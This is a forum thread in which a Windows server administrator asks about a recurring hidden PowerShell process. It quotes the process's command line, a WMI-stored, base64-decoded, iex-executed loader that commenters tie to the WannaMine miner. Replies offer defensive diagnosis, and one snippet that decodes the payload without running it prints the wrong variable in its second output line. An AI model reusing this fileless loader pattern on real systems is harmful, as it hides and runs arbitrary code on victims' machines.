# Windows Server: How do I find out why a PowerShell process keeps starting and what it does?

Tags: windows, powershell, server

I'm seeing a PowerShell process that keeps starting, and I don't know why.

According to Process Explorer the PowerShell process looks like this:

```
powershell -NoP -NonI -W Hidden -exec bypass "$am = ([WmiClass] 'root\default:systemcore_Updater8').Properties['am'].Value;$deam=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($am));iex $deam;$co = ([WmiClass] 'root\default:systemcore_Updater8').Properties['enco'].Value;$deco=[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($co));iex $deco"
```

Something that converts from Base 64 string looks fishy to me, but apart from that, I can't decode (ha!) what's going on here.

When I kill the process it restarts at some time  (few minutes to half an hour)

I've been unable to find any thing in Task Manager that seems to start the process.

I'm starting to suspect something very fishy.

Any suggestions?

Comment: Looks like malicious code indeed. I would try and removing it using MalwareBytes

Comment: Check your Scheduled Tasks collection, it may well be starting from there (along with an explanation of what it does). The `systemcore_Updater8` is nothing standard that I can find, and the code basically gets two properties, decodes the Base64 value and then executes both as a PowerShell script, so this can be used to execute arbitrary code. That doesn't *necessarily* make it malicious (Hanlon's Razor applies and it might be some official third-party software going about things in an obtuse way) but does make it suspicious.

Comment: [WannaMine](https://support.sophos.com/support/s/article/KB-000038535?language=en_US&c__displayLanguage=en_US) uses `systemcore_Updater8` but it's unclear to me if it's the source of that class or if it's just using it. Odds are, it's the source though. You could instruct Powershell globally to log all it's executing and get what actually get's Invoked.

Answer (score 1):

Not an answer but it doesn't fit in comments:
You can execute following commands to show you what the script is invoking (iex)

```
$am = ([WmiClass] 'root\default:systemcore_Updater8').Properties['am'].Value;
$deam=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($am));
Write-Output $deam

$co = ([WmiClass] 'root\default:systemcore_Updater8').Properties['enco'].Value;
$deco=[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($co));
Write-Output $deam
```